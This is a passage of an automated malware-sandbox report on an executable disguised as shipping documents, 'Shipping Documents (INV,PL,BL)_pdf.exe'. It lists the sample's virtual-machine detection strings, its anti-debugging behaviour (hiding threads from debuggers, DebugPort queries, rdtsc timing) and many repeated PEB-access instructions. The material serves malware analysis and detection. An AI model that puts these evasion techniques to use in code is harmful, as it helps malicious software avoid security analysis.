      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000003.00000000.292196573.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000003.00000000.285586778.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&v
      Source: explorer.exe, 00000003.00000002.498066885.0000000005603000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,000000000_2_020F086A
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A rdtsc 0_2_020F086A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F4A77 LdrInitializeThunk,0_2_020F4A77
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F89EB mov eax, dword ptr fs:[00000030h]0_2_020F89EB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F421E mov eax, dword ptr fs:[00000030h]0_2_020F421E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F8A85 mov eax, dword ptr fs:[00000030h]0_2_020F8A85
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FAB mov eax, dword ptr fs:[00000030h]0_2_020F2FAB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FB8 mov eax, dword ptr fs:[00000030h]0_2_020F2FB8
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FFD mov eax, dword ptr fs:[00000030h]0_2_020F2FFD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F7C4F mov eax, dword ptr fs:[00000030h]0_2_020F7C4F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2C7F mov eax, dword ptr fs:[00000030h]0_2_020F2C7F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F24E2 mov eax, dword ptr fs:[00000030h]0_2_020F24E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F6CF0 mov eax, dword ptr fs:[00000030h]0_2_020F6CF0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F89EE mov eax, dword ptr fs:[00000030h]0_2_020F89EE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]1_2_1E46AE44
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]1_2_1E46AE44
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]1_2_1E3E4A2C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]1_2_1E3E4A2C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46EA55 mov eax, dword ptr fs:[00000030h]1_2_1E46EA55
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E434257 mov eax, dword ptr fs:[00000030h]1_2_1E434257
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AE620 mov eax, dword ptr fs:[00000030h]1_2_1E3AE620
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]1_2_1E3C3A1C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h]1_2_1E3DA61C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h]1_2_1E3DA61C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E45B260 mov eax, dword ptr fs:[00000030h]1_2_1E45B260
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E45B260 mov eax, dword ptr fs:[00000030h]1_2_1E45B260
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478A62 mov eax, dword ptr fs:[00000030h]1_2_1E478A62
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A5210 mov eax, dword ptr fs:[00000030h]1_2_1E3A5210
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]1_2_1E3A5210
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A5210 mov eax, dword ptr fs:[00000030h]1_2_1E3A5210
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A5210 mov eax, dword ptr fs:[00000030h]1_2_1E3A5210
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]1_2_1E3AAA16
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]1_2_1E3AAA16
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]1_2_1E3B8A0A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]1_2_1E3AC600
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]1_2_1E3AC600
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]1_2_1E3AC600
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]1_2_1E3D8E00
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E927A mov eax, dword ptr fs:[00000030h]1_2_1E3E927A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461608 mov eax, dword ptr fs:[00000030h]1_2_1E461608
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B766D mov eax, dword ptr fs:[00000030h]1_2_1E3B766D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]1_2_1E3A9240
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]1_2_1E3A9240
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]1_2_1E3A9240
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]1_2_1E3A9240
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E45FE3F mov eax, dword ptr fs:[00000030h]1_2_1E45FE3F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]1_2_1E45FEC0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]1_2_1E3BAAB0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]1_2_1E3BAAB0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]1_2_1E3DFAB0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478ED6 mov eax, dword ptr fs:[00000030h]1_2_1E478ED6
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]1_2_1E3A52A5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]1_2_1E3A52A5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]1_2_1E3A52A5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]1_2_1E3A52A5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]1_2_1E3A52A5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DD294 mov eax, dword ptr fs:[00000030h]1_2_1E3DD294
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DD294 mov eax, dword ptr fs:[00000030h]1_2_1E3DD294
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43FE87 mov eax, dword ptr fs:[00000030h]1_2_1E43FE87
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]1_2_1E3B76E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]1_2_1E3D2AE4
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]1_2_1E3D16E0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E470EA5 mov eax, dword ptr fs:[00000030h]1_2_1E470EA5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E470EA5 mov eax, dword ptr fs:[00000030h]1_2_1E470EA5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E470EA5 mov eax, dword ptr fs:[00000030h]1_2_1E470EA5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4246A7 mov eax, dword ptr fs:[00000030h]1_2_1E4246A7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D36CC mov eax, dword ptr fs:[00000030h]1_2_1E3D36CC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]1_2_1E3D2ACB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]1_2_1E3E8EC7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DE730 mov eax, dword ptr fs:[00000030h]1_2_1E3DE730
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]1_2_1E3A4F2E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]1_2_1E3A4F2E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478B58 mov eax, dword ptr fs:[00000030h]1_2_1E478B58
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CF716 mov eax, dword ptr fs:[00000030h]1_2_1E3CF716
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478F6A mov eax, dword ptr fs:[00000030h]1_2_1E478F6A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA70E mov eax, dword ptr fs:[00000030h]1_2_1E3DA70E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA70E mov eax, dword ptr fs:[00000030h]1_2_1E3DA70E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]1_2_1E3D3B7A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]1_2_1E3D3B7A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47070D mov eax, dword ptr fs:[00000030h]1_2_1E47070D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47070D mov eax, dword ptr fs:[00000030h]1_2_1E47070D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43FF10 mov eax, dword ptr fs:[00000030h]1_2_1E43FF10
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43FF10 mov eax, dword ptr fs:[00000030h]1_2_1E43FF10
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]1_2_1E3ADB60
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]1_2_1E3BFF60
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46131B mov eax, dword ptr fs:[00000030h]1_2_1E46131B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AF358 mov eax, dword ptr fs:[00000030h]1_2_1E3AF358
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]1_2_1E3ADB40
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]1_2_1E3BEF40
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4253CA mov eax, dword ptr fs:[00000030h]1_2_1E4253CA
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4253CA mov eax, dword ptr fs:[00000030h]1_2_1E4253CA
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]1_2_1E3D4BAD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]1_2_1E3D4BAD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]1_2_1E3D4BAD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2397 mov eax, dword ptr fs:[00000030h]1_2_1E3D2397
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DB390 mov eax, dword ptr fs:[00000030h]1_2_1E3DB390
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B8794 mov eax, dword ptr fs:[00000030h]1_2_1E3B8794
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]1_2_1E3B1B8F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]1_2_1E3B1B8F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E45D380 mov ecx, dword ptr fs:[00000030h]1_2_1E45D380
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]1_2_1E3E37F5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46138A mov eax, dword ptr fs:[00000030h]1_2_1E46138A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]1_2_1E3CDBE9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427794 mov eax, dword ptr fs:[00000030h]1_2_1E427794
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427794 mov eax, dword ptr fs:[00000030h]1_2_1E427794
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427794 mov eax, dword ptr fs:[00000030h]1_2_1E427794
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]1_2_1E3D03E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]1_2_1E3D03E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]1_2_1E3D03E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]1_2_1E3D03E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]1_2_1E3D03E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]1_2_1E3D03E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E475BA5 mov eax, dword ptr fs:[00000030h]1_2_1E475BA5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]1_2_1E3D002D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]1_2_1E3D002D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]1_2_1E3D002D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]1_2_1E3D002D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]1_2_1E3D002D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]1_2_1E3BB02A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]1_2_1E3BB02A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]1_2_1E3BB02A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]1_2_1E3BB02A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]1_2_1E3DBC2C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43C450 mov eax, dword ptr fs:[00000030h]1_2_1E43C450
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43C450 mov eax, dword ptr fs:[00000030h]1_2_1E43C450
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E471074 mov eax, dword ptr fs:[00000030h]1_2_1E471074
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E462073 mov eax, dword ptr fs:[00000030h]1_2_1E462073
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]1_2_1E461C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]1_2_1E426C0A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]1_2_1E426C0A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]1_2_1E426C0A
